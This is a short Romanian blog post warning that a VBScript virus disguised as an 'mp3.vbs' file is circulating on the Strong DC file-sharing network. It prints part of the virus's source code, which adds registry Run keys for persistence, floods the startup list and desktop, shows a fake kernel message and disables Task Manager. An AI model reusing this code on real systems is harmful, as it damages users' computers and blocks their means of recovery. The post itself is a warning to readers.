Site Network: Home | poze | alte chestii | Despre mine

Intrat pe Strong dc ca sa vad ce mai copiaza lumea... pe primul loc detasat ramane Porno am gasit o chestie interesanta... un nou virus care circula pe Strong dc.
Daca veti observa extentie dubla de felul mp3.vbs sa nu rulati pentru ca este un cirus frumusel care se autocopaiza in startup,iti blocheaza accesul la Task manager si multe altele.

Si o mica parte din codul sursa .

function StrtEachStartup(KeyName,KeyVal)
on error resume next
wscr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\"&KeyName,KeyVal
wscr.Regwrite "HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run\"&KeyName,KeyVal
end function

sub ShowMessage ()
on error resume next
mylogo=" /\ /\" & vbcrlf &_
" // /| |\ \\" & vbcrlf&_
" // || || \\" & vbcrlf&_
" (////||X|||\\\\)" & vbcrlf&_
" || ||" & vbcrlf&_
" \| |/ " & vbcrlf & vbcrlf
msgbox "kernel32.dll @"&vbcrlf&"SET NEW fs.kernel:=[Lido44.dll] ;) "&vbcrlf&"Kernel44.dll : Sandwich based" _
& vbcrlf & vbcrlf & mylogo& " -= THE MAD KERNEL =-",28,"WinZaws explorer [KERNEL32.DLL]"
end sub

sub ADDfilesToDesktop()
on error resume next
rr = wscr.regread("HKEY_CURRENT_USER\Software\Microsoft\"&_
"Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
for i=1 to 99
set c=fso.GetFile(sys32dir&"\"&HTMLname)
htmxfiles="\message_sandwich{"& hex(int(timer+date+i)) &"}.htm"
c.copy (rr & htmxfiles )
next
end sub


sub OpenManyApps()
on error resume next
for i=1 to 12
StrtEachStartup "l44sys"&i,"freecell"
StrtEachStartup "l44sys"&i+32,"winmine"
StrtEachStartup "l44sys"&i+64,"iexplore"
next
end sub
on error resume next

sub DisableCtrAlrSupp()
on error resume next
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
end sub

0 Comments:

Post a Comment